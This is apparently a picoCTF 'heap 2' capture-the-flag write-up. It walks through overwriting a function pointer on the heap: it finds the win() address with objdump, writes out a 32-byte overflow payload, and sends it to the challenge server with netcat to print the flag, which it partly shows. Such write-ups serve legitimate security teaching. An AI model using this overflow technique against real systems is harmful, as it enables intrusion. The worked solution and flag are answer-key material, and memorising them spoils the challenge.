Description
Can you handle function pointers?
Setup
Local + remote
Download chall and chall.c for local reversing.
Connect to mimas.picoctf.net <PORT_FROM_INSTANCE> to exploit the live service.
wget https://artifacts.picoctf.net/c_mimas/51/chall && \
chmod +x chall && \
wget https://artifacts.picoctf.net/c_mimas/51/chall.c
nc mimas.picoctf.net <PORT_FROM_INSTANCE>
Solution
This builds on heap 0 and heap 1 by introducing function pointer overwrites. Complete this challenge, then tackle heap 3 to learn use-after-free techniques.
- Step 1Find win()Use objdump -D chall | grep win to note the win() address (0x4011a0). Because the program runs on little-endian amd64, the payload must use the reversed byte order.objdump -D chall | less
- Step 2Craft the payloadOverflow the 32-byte buffer with filler followed by the little-endian win() pointer (\xa0\x11\x40\x00\x00\x00\x00\x00).AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xa0\x11\x40\x00\x00\x00\x00\x00
- Step 3Automate the menu interactionSend option 2, deliver the payload, then call option 4 to execute the overwritten function pointer and print the flag.echo -e -n "2\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xa0\x11\x40\x00\x00\x00\x00\x00\n4\n" | nc mimas.picoctf.net <PORT_FROM_INSTANCE>A short pwntools script can accomplish the same thing if you prefer Python automation.
Flag
picoCTF{and_down_the_road_we_go_dbb...}
Overwriting the function pointer with win() immediately prints the flag.